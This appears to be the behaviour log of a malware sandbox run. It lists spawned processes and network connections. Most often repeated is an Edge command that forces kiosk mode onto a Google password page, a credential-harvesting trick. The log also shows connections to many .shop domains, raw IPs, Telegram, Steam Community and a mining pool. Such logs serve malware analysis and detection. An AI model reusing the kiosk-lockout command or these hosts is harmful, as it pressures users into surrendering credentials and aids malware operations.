"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Programs\PCV Convert Manager\pdfconv.exe

"C:\Users\Admin\AppData\Local\Programs\PCV Convert Manager\pdfconv.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
NL 45.9.148.254:80 45.9.148.254 tcp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 254.148.9.45.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 voinformatica.com.pt udp
PT 80.172.227.23:443 voinformatica.com.pt tcp
US 8.8.8.8:53 23.227.172.80.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
GB 89.197.154.116:80 89.197.154.116 tcp
RU 31.41.244.9:80 31.41.244.9 tcp
US 8.8.8.8:53 ignoracndwko.shop udp
US 172.67.207.50:443 ignoracndwko.shop tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 116.154.197.89.in-addr.arpa udp
US 8.8.8.8:53 9.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 50.207.67.172.in-addr.arpa udp
US 8.8.8.8:53 preachstrwnwjw.shop udp
US 172.67.147.51:443 preachstrwnwjw.shop tcp
CH 147.45.44.104:80 147.45.44.104 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 51.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 41.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 104.44.45.147.in-addr.arpa udp
US 8.8.8.8:53 complainnykso.shop udp
US 172.67.151.164:443 complainnykso.shop tcp
RU 185.215.113.103:80 185.215.113.103 tcp
US 8.8.8.8:53 basedsymsotp.shop udp
US 104.21.78.130:443 basedsymsotp.shop tcp
US 8.8.8.8:53 164.151.67.172.in-addr.arpa udp
US 8.8.8.8:53 103.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 130.78.21.104.in-addr.arpa udp
US 8.8.8.8:53 charistmatwio.shop udp
US 104.21.90.30:443 charistmatwio.shop tcp
US 8.8.8.8:53 grassemenwji.shop udp
US 104.21.48.158:443 grassemenwji.shop tcp
RU 185.215.113.103:80 185.215.113.103 tcp
US 8.8.8.8:53 30.90.21.104.in-addr.arpa udp
US 8.8.8.8:53 158.48.21.104.in-addr.arpa udp
US 8.8.8.8:53 crl.godaddy.com udp
US 192.124.249.41:80 crl.godaddy.com tcp
US 8.8.8.8:53 stitchmiscpaew.shop udp
US 172.67.136.135:443 stitchmiscpaew.shop tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 135.136.67.172.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 commisionipwn.shop udp
US 104.21.38.33:443 commisionipwn.shop tcp
DE 91.107.179.108:443 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
DE 91.107.179.108:443 tcp
US 8.8.8.8:53 33.38.21.104.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 108.179.107.91.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 tenntysjuxmz.shop udp
US 104.21.39.10:443 tenntysjuxmz.shop tcp
DE 91.107.179.108:443 tcp
US 8.8.8.8:53 10.39.21.104.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
IR 37.156.29.141:80 37.156.29.141 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
DE 91.107.179.108:443 tcp
US 8.8.8.8:53 141.29.156.37.in-addr.arpa udp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
DE 91.107.179.108:443 tcp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
DE 91.107.179.108:443 tcp
RU 31.41.244.10:80 31.41.244.10 tcp
DE 91.107.179.108:443 tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
PT 80.172.227.23:443 voinformatica.com.pt tcp
US 8.8.8.8:53 10.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
DE 91.107.179.108:443 tcp
RU 185.215.113.103:80 185.215.113.103 tcp
US 172.67.207.50:443 ignoracndwko.shop tcp
DE 91.107.179.108:443 tcp
US 172.67.147.51:443 preachstrwnwjw.shop tcp
US 172.67.151.164:443 complainnykso.shop tcp
DE 91.107.179.108:443 tcp
US 104.21.78.130:443 basedsymsotp.shop tcp
US 104.21.90.30:443 charistmatwio.shop tcp
US 8.8.8.8:53 gacan.zapto.org udp
US 104.21.48.158:443 grassemenwji.shop tcp
NL 149.154.167.99:443 t.me tcp
US 172.67.136.135:443 stitchmiscpaew.shop tcp
FI 147.45.126.10:80 147.45.126.10 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.21.38.33:443 commisionipwn.shop tcp
US 8.8.8.8:53 10.126.45.147.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 13.89.179.12:443 nw-umwatson.events.data.microsoft.com tcp
US 104.21.39.10:443 tenntysjuxmz.shop tcp
US 8.8.8.8:53 12.179.89.13.in-addr.arpa udp
NL 91.92.253.107:1334 tcp
SE 5.42.92.222:7880 tcp
RU 185.215.113.103:80 185.215.113.103 tcp
US 13.89.179.12:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:443 pool.hashvault.pro tcp
US 13.89.179.12:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 13.89.179.12:443 nw-umwatson.events.data.microsoft.com tcp
US 13.89.179.12:443 nw-umwatson.events.data.microsoft.com tcp
NL 91.92.253.107:1334 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 29.73.42.20.in-addr.arpa udp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 ipvplasticos.com udp
US 147.135.121.216:80 ipvplasticos.com tcp
RO 65.38.121.166:8568 65.38.121.166 tcp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 166.121.38.65.in-addr.arpa udp
US 8.8.8.8:53 216.121.135.147.in-addr.arpa udp
NL 91.92.253.107:1334 tcp
GB 89.197.154.115:80 89.197.154.115 tcp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 115.154.197.89.in-addr.arpa udp
CH 147.45.44.131:80 147.45.44.131 tcp
GB 89.197.154.115:7700 tcp
CN 106.13.33.204:443 tcp
US 8.8.8.8:53 131.44.45.147.in-addr.arpa udp
GB 89.197.154.115:7700 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 limitadmitiwo.shop udp
US 172.67.188.237:443 limitadmitiwo.shop tcp
US 8.8.8.8:53 locatedblsoqp.shop udp
US 8.8.8.8:53 173.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 237.188.67.172.in-addr.arpa udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
GB 89.197.154.115:7700 tcp
US 8.8.8.8:53 traineiwnqo.shop udp
US 8.8.8.8:53 condedqpwqm.shop udp
US 8.8.8.8:53 evoliutwoqm.shop udp
US 8.8.8.8:53 millyscroqwp.shop udp
US 8.8.8.8:53 stagedchheiqwo.shop udp
US 8.8.8.8:53 stamppreewntnq.shop udp
US 8.8.8.8:53 caffegclasiqwp.shop udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 104.21.39.10:443 tenntysjuxmz.shop tcp
GB 89.197.154.115:7700 tcp
NL 91.92.253.107:1334 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.172:443 nw-umwatson.events.data.microsoft.com tcp
GB 89.197.154.115:7700 tcp
US 8.8.8.8:53 172.117.168.52.in-addr.arpa udp
SE 5.42.92.222:7880 tcp
US 52.168.117.172:443 nw-umwatson.events.data.microsoft.com tcp
GB 89.197.154.115:7700 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.189.173.20:443 nw-umwatson.events.data.microsoft.com tcp
GB 89.197.154.115:7700 tcp
NL 91.92.253.107:1334 tcp
US 8.8.8.8:53 20.173.189.20.in-addr.arpa udp
US 20.189.173.20:443 nw-umwatson.events.data.microsoft.com tcp
GB 89.197.154.115:7700 tcp
US 20.189.173.20:443 nw-umwatson.events.data.microsoft.com tcp
GB 89.197.154.115:7700 tcp
US 20.189.173.20:443 nw-umwatson.events.data.microsoft.com tcp
GB 89.197.154.115:7700 tcp
NL 91.92.253.107:1334 tcp
CN 111.229.236.116:443 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
GB 89.197.154.115:7700 tcp
